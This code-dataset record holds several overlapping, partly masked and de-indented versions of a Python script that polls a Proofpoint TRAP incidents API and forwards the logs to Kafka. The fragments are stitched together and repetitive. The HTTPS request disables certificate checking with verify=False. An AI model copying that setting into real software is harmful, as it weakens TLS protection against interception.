    failure is logged and re-raised to the caller.
    """
    set_creds()
    producer = Producer(topic=topic_name)
    logger.info('producer created')
    try:
        for record in logs:
            producer.produce_message(json.dumps(record).encode())
    except Exception as e:
        logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'
            )
        raise e
    finally:
        producer.close()
def pull_pp_trap_logs(minutes_before):
    """Pull incidents from the Proofpoint TRAP API for one 5-minute window.

    The queried window is [now - minutes_before - 20m, now - minutes_before - 15m],
    so a positive *minutes_before* replays older data for catch-up.
    Returns the parsed JSON response, or None on failure (an SNS alert is
    generated in that case).
    """
    logger.info('retrieving secrets for pp_trap')
    current_time = datetime.datetime.utcnow()
    if minutes_before > 0:
        # Shift the reference point back to replay an older window.
        current_time = current_time - datetime.timedelta(minutes=minutes_before
            )
    # Timestamps trimmed to 2 fractional digits with a literal 'Z' (UTC)
    # suffix — presumably the format the TRAP API expects; confirm with API docs.
    fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)
        ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
    twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)
        ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
    qs = {'created_after': twenty_minutes_ago, 'created_before':
        fifteen_minutes_ago, 'expand_events': 'false'}
    try:
        # NOTE(review): verify=False disables TLS certificate validation for
        # this internal endpoint; prefer pinning the internal CA instead.
        r = requests.get('https://10.47.172.28/api/incidents', params=qs,
            headers={'Authorization': prod.pp_trap_api_key}, verify=False)
        # FIX: use the module logger instead of print(); also stop dumping the
        # full JSON payload to stdout.
        logger.info(f'TRAP API status code: {r.status_code}')
        json_object = r.json()
        return json_object
    except Exception as e:
        sns.generate_sns('proofpoint_trap')
        logger.error(f'Error for TRAP API call: {str(e)}')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger.setLevel('INFO')
<|reserved_special_token_0|>
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
class Producer:
    """Thin wrapper around KafkaProducer, configured from environment variables.

    Expects KAFKA_USERNAME, KAFKA_PASSWORD and KAFKA_HOSTS to be set
    (see set_creds) and a CA certificate at /opt/scripts/ca-cert.cer.
    """

    def __init__(self, topic):
        self.topic_name = topic
        producer_config = {
            'bootstrap_servers': os.environ['KAFKA_HOSTS'],
            'acks': 1,
            'compression_type': 'snappy',
            'retries': 5,
            'linger_ms': 200,
            'batch_size': 1000,
            'request_timeout_ms': 100000,
            'sasl_plain_username': os.environ['KAFKA_USERNAME'],
            'sasl_plain_password': os.environ['KAFKA_PASSWORD'],
            'security_protocol': 'SASL_SSL',
            'sasl_mechanism': 'PLAIN',
            'ssl_cafile': '/opt/scripts/ca-cert.cer',
            'api_version': (0, 10, 1),
        }
        self.producer = KafkaProducer(**producer_config)

    def produce_message(self, message):
        # Asynchronous send; delivery is forced by flush() in close().
        self.producer.send(self.topic_name, message)

    def close(self):
        # Flush pending batches before closing the client.
        self.producer.flush()
        self.producer.close()
        logger.info('closed')
def set_creds():
    """Fetch Kafka credentials from the secret store and export them as env vars.

    Populates KAFKA_USERNAME, KAFKA_PASSWORD and KAFKA_HOSTS, which the
    Producer class reads on construction.
    """
    secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',
        'password', 'kafka_hosts'])
    for env_name, secret_key in (('KAFKA_USERNAME', 'username'),
                                 ('KAFKA_PASSWORD', 'password'),
                                 ('KAFKA_HOSTS', 'kafka_hosts')):
        os.environ[env_name] = secrets[secret_key]
def run_kafka_producer_job(logs, topic_name):
    """Serialize each record in *logs* as JSON and publish it to *topic_name*.

    Credentials are refreshed via set_creds() before the producer is built.
    The producer is always closed (flushing pending messages), and any
    failure is logged and re-raised to the caller.
    """
    set_creds()
    producer = Producer(topic=topic_name)
    logger.info('producer created')
    try:
        for record in logs:
            producer.produce_message(json.dumps(record).encode())
    except Exception as e:
        logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'
            )
        raise e
    finally:
        producer.close()
def pull_pp_trap_logs(minutes_before):
logger.info('retrieving secrets for pp_trap')
current_time = datetime.datetime.utcnow()
if minutes_before > 0:
current_time = current_time - datetime.timedelta(minutes=minutes_before
)
fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)
).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)
).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
qs = {'created_after': twenty_minutes_ago, 'created_before':
fifteen_minutes_ago, 'expand_events': 'false'}
try:
r = requests.get('https://10.47.172.28/api/incidents', params=qs,
headers={'Authorization': prod.pp_trap_api_key}, verify=False)
print(r.status_code)
json_object = r.json()
print(json_object)
return json_object
except Exception as e:
sns.generate_sns('proofpoint_trap')
logger.error(f'Error for TRAP API call: {str(e)}')
if __name__ == '__main__':
minutes_before = 0 * 60
minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')
if os.path.exists(minutes_before_file):
with open(minutes_before_file, 'r') as minutes_file:
line = minutes_file.readline()
line = line.strip()
minutes_before = int(line)
while True:
"""
Query TRAP API (JSON format) starting from minutes_before
send logs to kafka
reduce minutes_before in next iteration and repeat
when iteration reaches now -20 minutes
run the job once every 5 minutes
"""
logger.info(f'minutes before: {minutes_before}')
if minutes_before <= 0:
logger.info('waiting for 5 minutes')
time.sleep(300)
logger.info('TRAP query started')
logs = pull_pp_trap_logs(minutes_before)
logger.info('TRAP query finished')
minutes_before = minutes_before - 5
if logs:
logger.info('TRAP_produce started')
run_kafka_producer_job(logs,
'test_log_security_proofpoint.trap_weekly')
logger.info('TRAP_produce finished')
else:
logger.info('No logs for TRAP call.')
with open(minutes_before_file, 'w') as minutes_file:
minutes_before = 0 if minutes_before < 0 else minutes_before
minutes_file.write(str(minutes_before))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logging.getLogger()
logger.setLevel('INFO')
log_path = os.path.basename(__file__).split('.')[0] + '.log'
handler = RotatingFileHandler(log_path, maxBytes=1000000, backupCount=5)
formatter = logging.Formatter(
'[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s')
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
class Producer:
def __init__(self, topic):
kafka_uname = os.environ['KAFKA_USERNAME']
kafka_pwd = os.environ['KAFKA_PASSWORD']
kafka_hosts = os.environ['KAFKA_HOSTS']
ssl_truststore_file = '/opt/scripts/ca-cert.cer'
self.topic_name = topic
self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,
compression_type='snappy', retries=5, linger_ms=200, batch_size
=1000, request_timeout_ms=100000, sasl_plain_username=
kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=
'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=
ssl_truststore_file, api_version=(0, 10, 1))
def produce_message(self, message):
self.producer.send(self.topic_name, message)
def close(self):
self.producer.flush()
self.producer.close()
logger.info('closed')
def set_creds():
secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',
'password', 'kafka_hosts'])
os.environ['KAFKA_USERNAME'] = secrets['username']
os.environ['KAFKA_PASSWORD'] = secrets['password']
os.environ['KAFKA_HOSTS'] = secrets['kafka_hosts']
def run_kafka_producer_job(logs, topic_name):
set_creds()
producer = Producer(topic=topic_name)
logger.info('producer created')
try:
for l in logs:
to_send = json.dumps(l)
producer.produce_message(to_send.encode())
except Exception as e:
logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'
)
raise e
finally:
producer.close()
def pull_pp_trap_logs(minutes_before):
logger.info('retrieving secrets for pp_trap')
current_time = datetime.datetime.utcnow()
if minutes_before > 0:
current_time = current_time - datetime.timedelta(minutes=minutes_before
)
fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)
).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)
).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
qs = {'created_after': twenty_minutes_ago, 'created_before':
fifteen_minutes_ago, 'expand_events': 'false'}
try:
r = requests.get('https://10.47.172.28/api/incidents', params=qs,
headers={'Authorization': prod.pp_trap_api_key}, verify=False)
print(r.status_code)
json_object = r.json()
print(json_object)
return json_object
except Exception as e:
sns.generate_sns('proofpoint_trap')
logger.error(f'Error for TRAP API call: {str(e)}')
if __name__ == '__main__':
minutes_before = 0 * 60
minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')
if os.path.exists(minutes_before_file):
with open(minutes_before_file, 'r') as minutes_file:
line = minutes_file.readline()
line = line.strip()
minutes_before = int(line)
while True:
"""
Query TRAP API (JSON format) starting from minutes_before
send logs to kafka
reduce minutes_before in next iteration and repeat
when iteration reaches now -20 minutes
run the job once every 5 minutes
"""
logger.info(f'minutes before: {minutes_before}')
if minutes_before <= 0:
logger.info('waiting for 5 minutes')
time.sleep(300)
logger.info('TRAP query started')
logs = pull_pp_trap_logs(minutes_before)
logger.info('TRAP query finished')
minutes_before = minutes_before - 5
if logs:
logger.info('TRAP_produce started')
run_kafka_producer_job(logs,
'test_log_security_proofpoint.trap_weekly')
logger.info('TRAP_produce finished')
else:
logger.info('No logs for TRAP call.')
with open(minutes_before_file, 'w') as minutes_file:
minutes_before = 0 if minutes_before < 0 else minutes_before
minutes_file.write(str(minutes_before))
<|reserved_special_token_1|>
#!/usr/bin/env python3
import logging
import datetime
import os
import time
import json
import prod
import secret
from logging.handlers import RotatingFileHandler
import requests
import sns
from kafka import KafkaProducer
# Root logger writes to a rotating file named after this script
# (e.g. <script>.log), capped at ~1 MB with 5 backups kept.
logger = logging.getLogger()
logger.setLevel('INFO')
log_path = os.path.basename(__file__).split('.')[0] + '.log'

handler = RotatingFileHandler(
    log_path, maxBytes=1000000, backupCount=5)
formatter = logging.Formatter(
    "[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s")
# Handler accepts DEBUG, but the logger-level filter (INFO) runs first,
# so DEBUG records never actually reach the file.
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
class Producer:
    """Thin wrapper around KafkaProducer bound to a single topic.

    Connection credentials and broker addresses are read from the
    environment (KAFKA_USERNAME / KAFKA_PASSWORD / KAFKA_HOSTS), which
    set_creds() is expected to have populated beforehand.
    """

    def __init__(self, topic):
        self.topic_name = topic
        # SASL/SSL connection settings; the CA certificate is expected
        # on disk at a fixed path on the host.
        conn_settings = dict(
            bootstrap_servers=os.environ['KAFKA_HOSTS'],
            acks=1,
            compression_type='snappy',
            retries=5,
            linger_ms=200,
            batch_size=1000,
            request_timeout_ms=100000,
            sasl_plain_username=os.environ['KAFKA_USERNAME'],
            sasl_plain_password=os.environ['KAFKA_PASSWORD'],
            security_protocol="SASL_SSL",
            sasl_mechanism="PLAIN",
            # sasl_mechanism="SCRAM-SHA-512",
            ssl_cafile='/opt/scripts/ca-cert.cer',
            api_version=(0, 10, 1),
        )
        self.producer = KafkaProducer(**conn_settings)

    def produce_message(self, message):
        """Queue one already-encoded message for the bound topic."""
        self.producer.send(self.topic_name, message)

    def close(self):
        """Flush buffered messages, then shut the producer down."""
        self.producer.flush()
        self.producer.close()
        logger.info('closed')
def set_creds():
    """Load Kafka credentials from the secret store into the environment.

    Downstream code (Producer.__init__) reads these environment variables
    rather than taking credentials as arguments.
    """
    fetched = secret.get_secret(
        'ngsiem-aca-kafka-config', ['username', 'password', 'kafka_hosts'])
    for env_name, secret_key in (('KAFKA_USERNAME', 'username'),
                                 ('KAFKA_PASSWORD', 'password'),
                                 ('KAFKA_HOSTS', 'kafka_hosts')):
        os.environ[env_name] = fetched[secret_key]
def run_kafka_producer_job(logs, topic_name):
    """Serialize each record in *logs* to JSON and produce it to *topic_name*.

    Credentials are refreshed via set_creds() before the producer is built.
    The producer is always flushed/closed, even on failure, and any
    serialization/produce error is logged and re-raised to the caller.
    """
    set_creds()
    producer = Producer(topic=topic_name)
    logger.info('producer created')
    try:
        for record in logs:
            producer.produce_message(json.dumps(record).encode())
    except Exception as e:
        # Fix: this aborts the job, so log at ERROR (was INFO), and use a
        # bare `raise` so the original traceback is preserved (was `raise e`).
        logger.error(f'Error gathering the file or producing to Kafka: {str(e)}')
        raise
    finally:
        producer.close()
def pull_pp_trap_logs(minutes_before):
    """Fetch TRAP incidents created in a 5-minute window ending
    (minutes_before + 15) minutes before now (UTC).

    Args:
        minutes_before: backfill offset in minutes; > 0 shifts the whole
            query window further into the past.

    Returns:
        The decoded JSON payload, or None when the request fails
        (an SNS alert is raised in that case).
    """
    logger.info('retrieving secrets for pp_trap')
    current_time = datetime.datetime.utcnow()
    if minutes_before > 0:
        # Shift the reference point back for backfill runs.
        current_time = current_time - datetime.timedelta(minutes=minutes_before)

    def _fmt(dt):
        # API expects ISO-8601 with centisecond precision and a literal 'Z'.
        return dt.strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + "Z"

    qs = {
        "created_after": _fmt(current_time - datetime.timedelta(minutes=20)),
        "created_before": _fmt(current_time - datetime.timedelta(minutes=15)),
        "expand_events": "false",
    }
    try:
        # NOTE(review): verify=False disables TLS validation for this
        # internal endpoint; acceptable only on a trusted network.
        r = requests.get('https://10.47.172.28/api/incidents', params=qs,
                         headers={'Authorization': prod.pp_trap_api_key}, verify=False)
        # Fix: replaced debug print() of the status code and the full JSON
        # payload (potentially huge) with a single log line.
        logger.info(f'TRAP API status: {r.status_code}')
        return r.json()
    except Exception as e:
        sns.generate_sns("proofpoint_trap")
        logger.error(f"Error for TRAP API call: {str(e)}")
if __name__ == "__main__":
    # Backfill offset in minutes; overridden by the persisted
    # 'minutes_before' state file from a previous run, if present.
    minutes_before = 0 * 60
    minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')
    if os.path.exists(minutes_before_file):
        with open(minutes_before_file, 'r') as minutes_file:
            line = minutes_file.readline()
            line = line.strip()
            minutes_before = int(line)

    while True:
        """
        Query TRAP API (JSON format) starting from minutes_before
        send logs to kafka
        reduce minutes_before in next iteration and repeat
        when iteration reaches now -20 minutes
        run the job once every 5 minutes
        """
        logger.info(f'minutes before: {minutes_before}')
        # Once the backfill is exhausted, throttle to one query per 5 minutes.
        if minutes_before <= 0:
            logger.info('waiting for 5 minutes')
            time.sleep(300)

        logger.info('TRAP query started')
        logs = pull_pp_trap_logs(minutes_before)
        logger.info('TRAP query finished')
        # Each pass covers a 5-minute window, so advance the offset by 5.
        minutes_before = minutes_before - 5

        if logs:
            logger.info('TRAP_produce started')
            run_kafka_producer_job(logs, 'test_log_security_proofpoint.trap_weekly')
            logger.info('TRAP_produce finished')
        else:
            logger.info("No logs for TRAP call.")
        # Persist the (clamped, non-negative) offset so a restart resumes
        # where this run left off.
        with open(minutes_before_file, 'w') as minutes_file:
            minutes_before = 0 if minutes_before < 0 else minutes_before
            minutes_file.write(str(minutes_before))
|
flexible
|
{
"blob_id": "283b93437072f0fd75d75dab733ecab05dc9e1f3",
"index": 3872,
"step-1": "<mask token>\n\n\nclass Producer:\n\n def __init__(self, topic):\n kafka_uname = os.environ['KAFKA_USERNAME']\n kafka_pwd = os.environ['KAFKA_PASSWORD']\n kafka_hosts = os.environ['KAFKA_HOSTS']\n ssl_truststore_file = '/opt/scripts/ca-cert.cer'\n self.topic_name = topic\n self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,\n compression_type='snappy', retries=5, linger_ms=200, batch_size\n =1000, request_timeout_ms=100000, sasl_plain_username=\n kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=\n 'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=\n ssl_truststore_file, api_version=(0, 10, 1))\n\n def produce_message(self, message):\n self.producer.send(self.topic_name, message)\n\n def close(self):\n self.producer.flush()\n self.producer.close()\n logger.info('closed')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Producer:\n\n def __init__(self, topic):\n kafka_uname = os.environ['KAFKA_USERNAME']\n kafka_pwd = os.environ['KAFKA_PASSWORD']\n kafka_hosts = os.environ['KAFKA_HOSTS']\n ssl_truststore_file = '/opt/scripts/ca-cert.cer'\n self.topic_name = topic\n self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,\n compression_type='snappy', retries=5, linger_ms=200, batch_size\n =1000, request_timeout_ms=100000, sasl_plain_username=\n kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=\n 'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=\n ssl_truststore_file, api_version=(0, 10, 1))\n\n def produce_message(self, message):\n self.producer.send(self.topic_name, message)\n\n def close(self):\n self.producer.flush()\n self.producer.close()\n logger.info('closed')\n\n\ndef set_creds():\n secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',\n 'password', 'kafka_hosts'])\n os.environ['KAFKA_USERNAME'] = secrets['username']\n os.environ['KAFKA_PASSWORD'] = secrets['password']\n os.environ['KAFKA_HOSTS'] = secrets['kafka_hosts']\n\n\ndef run_kafka_producer_job(logs, topic_name):\n set_creds()\n producer = Producer(topic=topic_name)\n logger.info('producer created')\n try:\n for l in logs:\n to_send = json.dumps(l)\n producer.produce_message(to_send.encode())\n except Exception as e:\n logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'\n )\n raise e\n finally:\n producer.close()\n\n\ndef pull_pp_trap_logs(minutes_before):\n logger.info('retrieving secrets for pp_trap')\n current_time = datetime.datetime.utcnow()\n if minutes_before > 0:\n current_time = current_time - datetime.timedelta(minutes=minutes_before\n )\n fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n qs = {'created_after': twenty_minutes_ago, 
'created_before':\n fifteen_minutes_ago, 'expand_events': 'false'}\n try:\n r = requests.get('https://10.47.172.28/api/incidents', params=qs,\n headers={'Authorization': prod.pp_trap_api_key}, verify=False)\n print(r.status_code)\n json_object = r.json()\n print(json_object)\n return json_object\n except Exception as e:\n sns.generate_sns('proofpoint_trap')\n logger.error(f'Error for TRAP API call: {str(e)}')\n\n\n<mask token>\n",
"step-3": "<mask token>\nlogger.setLevel('INFO')\n<mask token>\nhandler.setLevel(logging.DEBUG)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\nclass Producer:\n\n def __init__(self, topic):\n kafka_uname = os.environ['KAFKA_USERNAME']\n kafka_pwd = os.environ['KAFKA_PASSWORD']\n kafka_hosts = os.environ['KAFKA_HOSTS']\n ssl_truststore_file = '/opt/scripts/ca-cert.cer'\n self.topic_name = topic\n self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,\n compression_type='snappy', retries=5, linger_ms=200, batch_size\n =1000, request_timeout_ms=100000, sasl_plain_username=\n kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=\n 'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=\n ssl_truststore_file, api_version=(0, 10, 1))\n\n def produce_message(self, message):\n self.producer.send(self.topic_name, message)\n\n def close(self):\n self.producer.flush()\n self.producer.close()\n logger.info('closed')\n\n\ndef set_creds():\n secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',\n 'password', 'kafka_hosts'])\n os.environ['KAFKA_USERNAME'] = secrets['username']\n os.environ['KAFKA_PASSWORD'] = secrets['password']\n os.environ['KAFKA_HOSTS'] = secrets['kafka_hosts']\n\n\ndef run_kafka_producer_job(logs, topic_name):\n set_creds()\n producer = Producer(topic=topic_name)\n logger.info('producer created')\n try:\n for l in logs:\n to_send = json.dumps(l)\n producer.produce_message(to_send.encode())\n except Exception as e:\n logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'\n )\n raise e\n finally:\n producer.close()\n\n\ndef pull_pp_trap_logs(minutes_before):\n logger.info('retrieving secrets for pp_trap')\n current_time = datetime.datetime.utcnow()\n if minutes_before > 0:\n current_time = current_time - datetime.timedelta(minutes=minutes_before\n )\n fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n twenty_minutes_ago = 
(current_time - datetime.timedelta(minutes=20)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n qs = {'created_after': twenty_minutes_ago, 'created_before':\n fifteen_minutes_ago, 'expand_events': 'false'}\n try:\n r = requests.get('https://10.47.172.28/api/incidents', params=qs,\n headers={'Authorization': prod.pp_trap_api_key}, verify=False)\n print(r.status_code)\n json_object = r.json()\n print(json_object)\n return json_object\n except Exception as e:\n sns.generate_sns('proofpoint_trap')\n logger.error(f'Error for TRAP API call: {str(e)}')\n\n\nif __name__ == '__main__':\n minutes_before = 0 * 60\n minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')\n if os.path.exists(minutes_before_file):\n with open(minutes_before_file, 'r') as minutes_file:\n line = minutes_file.readline()\n line = line.strip()\n minutes_before = int(line)\n while True:\n \"\"\"\n Query TRAP API (JSON format) starting from minutes_before\n send logs to kafka\n reduce minutes_before in next iteration and repeat\n when iteration reaches now -20 minutes\n run the job once every 5 minutes\n \"\"\"\n logger.info(f'minutes before: {minutes_before}')\n if minutes_before <= 0:\n logger.info('waiting for 5 minutes')\n time.sleep(300)\n logger.info('TRAP query started')\n logs = pull_pp_trap_logs(minutes_before)\n logger.info('TRAP query finished')\n minutes_before = minutes_before - 5\n if logs:\n logger.info('TRAP_produce started')\n run_kafka_producer_job(logs,\n 'test_log_security_proofpoint.trap_weekly')\n logger.info('TRAP_produce finished')\n else:\n logger.info('No logs for TRAP call.')\n with open(minutes_before_file, 'w') as minutes_file:\n minutes_before = 0 if minutes_before < 0 else minutes_before\n minutes_file.write(str(minutes_before))\n",
"step-4": "<mask token>\nlogger = logging.getLogger()\nlogger.setLevel('INFO')\nlog_path = os.path.basename(__file__).split('.')[0] + '.log'\nhandler = RotatingFileHandler(log_path, maxBytes=1000000, backupCount=5)\nformatter = logging.Formatter(\n '[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s')\nhandler.setLevel(logging.DEBUG)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\nclass Producer:\n\n def __init__(self, topic):\n kafka_uname = os.environ['KAFKA_USERNAME']\n kafka_pwd = os.environ['KAFKA_PASSWORD']\n kafka_hosts = os.environ['KAFKA_HOSTS']\n ssl_truststore_file = '/opt/scripts/ca-cert.cer'\n self.topic_name = topic\n self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,\n compression_type='snappy', retries=5, linger_ms=200, batch_size\n =1000, request_timeout_ms=100000, sasl_plain_username=\n kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=\n 'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=\n ssl_truststore_file, api_version=(0, 10, 1))\n\n def produce_message(self, message):\n self.producer.send(self.topic_name, message)\n\n def close(self):\n self.producer.flush()\n self.producer.close()\n logger.info('closed')\n\n\ndef set_creds():\n secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',\n 'password', 'kafka_hosts'])\n os.environ['KAFKA_USERNAME'] = secrets['username']\n os.environ['KAFKA_PASSWORD'] = secrets['password']\n os.environ['KAFKA_HOSTS'] = secrets['kafka_hosts']\n\n\ndef run_kafka_producer_job(logs, topic_name):\n set_creds()\n producer = Producer(topic=topic_name)\n logger.info('producer created')\n try:\n for l in logs:\n to_send = json.dumps(l)\n producer.produce_message(to_send.encode())\n except Exception as e:\n logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'\n )\n raise e\n finally:\n producer.close()\n\n\ndef pull_pp_trap_logs(minutes_before):\n logger.info('retrieving secrets for pp_trap')\n current_time = 
datetime.datetime.utcnow()\n if minutes_before > 0:\n current_time = current_time - datetime.timedelta(minutes=minutes_before\n )\n fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n qs = {'created_after': twenty_minutes_ago, 'created_before':\n fifteen_minutes_ago, 'expand_events': 'false'}\n try:\n r = requests.get('https://10.47.172.28/api/incidents', params=qs,\n headers={'Authorization': prod.pp_trap_api_key}, verify=False)\n print(r.status_code)\n json_object = r.json()\n print(json_object)\n return json_object\n except Exception as e:\n sns.generate_sns('proofpoint_trap')\n logger.error(f'Error for TRAP API call: {str(e)}')\n\n\nif __name__ == '__main__':\n minutes_before = 0 * 60\n minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')\n if os.path.exists(minutes_before_file):\n with open(minutes_before_file, 'r') as minutes_file:\n line = minutes_file.readline()\n line = line.strip()\n minutes_before = int(line)\n while True:\n \"\"\"\n Query TRAP API (JSON format) starting from minutes_before\n send logs to kafka\n reduce minutes_before in next iteration and repeat\n when iteration reaches now -20 minutes\n run the job once every 5 minutes\n \"\"\"\n logger.info(f'minutes before: {minutes_before}')\n if minutes_before <= 0:\n logger.info('waiting for 5 minutes')\n time.sleep(300)\n logger.info('TRAP query started')\n logs = pull_pp_trap_logs(minutes_before)\n logger.info('TRAP query finished')\n minutes_before = minutes_before - 5\n if logs:\n logger.info('TRAP_produce started')\n run_kafka_producer_job(logs,\n 'test_log_security_proofpoint.trap_weekly')\n logger.info('TRAP_produce finished')\n else:\n logger.info('No logs for TRAP call.')\n with open(minutes_before_file, 'w') as minutes_file:\n minutes_before = 0 if minutes_before < 0 else minutes_before\n 
minutes_file.write(str(minutes_before))\n",
"step-5": "#!/usr/bin/env python3\nimport logging\nimport datetime\nimport os\nimport time\nimport json\n\nimport prod\nimport secret\nfrom logging.handlers import RotatingFileHandler\nimport requests\nimport sns\nfrom kafka import KafkaProducer\n\nlogger = logging.getLogger()\nlogger.setLevel('INFO')\nlog_path = os.path.basename(__file__).split('.')[0] + '.log'\n\nhandler = RotatingFileHandler(\n log_path, maxBytes=1000000, backupCount=5)\nformatter = logging.Formatter(\n \"[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s\")\nhandler.setLevel(logging.DEBUG)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\nclass Producer():\n def __init__(self, topic):\n kafka_uname = os.environ['KAFKA_USERNAME']\n kafka_pwd = os.environ['KAFKA_PASSWORD']\n kafka_hosts = os.environ['KAFKA_HOSTS']\n ssl_truststore_file = '/opt/scripts/ca-cert.cer'\n\n self.topic_name = topic\n\n self.producer = KafkaProducer(\n bootstrap_servers=kafka_hosts,\n acks=1,\n compression_type='snappy',\n retries=5,\n linger_ms=200,\n batch_size=1000,\n request_timeout_ms=100000,\n sasl_plain_username=kafka_uname,\n sasl_plain_password=kafka_pwd,\n security_protocol=\"SASL_SSL\",\n sasl_mechanism=\"PLAIN\",\n # sasl_mechanism=\"SCRAM-SHA-512\",\n ssl_cafile=ssl_truststore_file,\n api_version=(0, 10, 1)\n )\n\n def produce_message(self, message):\n self.producer.send(self.topic_name, message)\n\n def close(self):\n self.producer.flush()\n self.producer.close()\n logger.info('closed')\n\n\ndef set_creds():\n secrets = secret.get_secret(\n 'ngsiem-aca-kafka-config', ['username', 'password', 'kafka_hosts'])\n os.environ['KAFKA_USERNAME'] = secrets['username']\n os.environ['KAFKA_PASSWORD'] = secrets['password']\n os.environ['KAFKA_HOSTS'] = secrets[\"kafka_hosts\"]\n\n\ndef run_kafka_producer_job(logs, topic_name):\n set_creds()\n producer = Producer(topic=topic_name)\n logger.info('producer created')\n try:\n for l in logs:\n to_send = json.dumps(l)\n 
producer.produce_message(to_send.encode())\n except Exception as e:\n logger.info(f'Error gathering the file or producing to Kafka: {str(e)}')\n raise e\n\n finally:\n producer.close()\n\n\ndef pull_pp_trap_logs(minutes_before):\n logger.info('retrieving secrets for pp_trap')\n current_time = datetime.datetime.utcnow()\n if minutes_before > 0:\n current_time = current_time - \\\n datetime.timedelta(minutes=minutes_before)\n\n fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + \"Z\"\n twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + \"Z\"\n\n qs = {\"created_after\": twenty_minutes_ago, \"created_before\": fifteen_minutes_ago, \"expand_events\": \"false\"}\n try:\n r = requests.get('https://10.47.172.28/api/incidents', params=qs,\n headers={'Authorization': prod.pp_trap_api_key}, verify=False)\n print(r.status_code)\n\n json_object = r.json()\n print(json_object)\n return json_object\n\n except Exception as e:\n sns.generate_sns(\"proofpoint_trap\")\n logger.error(f\"Error for TRAP API call: {str(e)}\")\n\n\nif __name__ == \"__main__\":\n minutes_before = 0 * 60\n minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')\n if os.path.exists(minutes_before_file):\n with open(minutes_before_file, 'r') as minutes_file:\n line = minutes_file.readline()\n line = line.strip()\n minutes_before = int(line)\n\n while True:\n \"\"\"\n Query TRAP API (JSON format) starting from minutes_before\n send logs to kafka\n reduce minutes_before in next iteration and repeat\n when iteration reaches now -20 minutes\n run the job once every 5 minutes\n \"\"\"\n logger.info(f'minutes before: {minutes_before}')\n if minutes_before <= 0:\n logger.info('waiting for 5 minutes')\n time.sleep(300)\n\n logger.info('TRAP query started')\n logs = pull_pp_trap_logs(minutes_before)\n logger.info('TRAP query finished')\n minutes_before = minutes_before - 5\n\n if logs:\n 
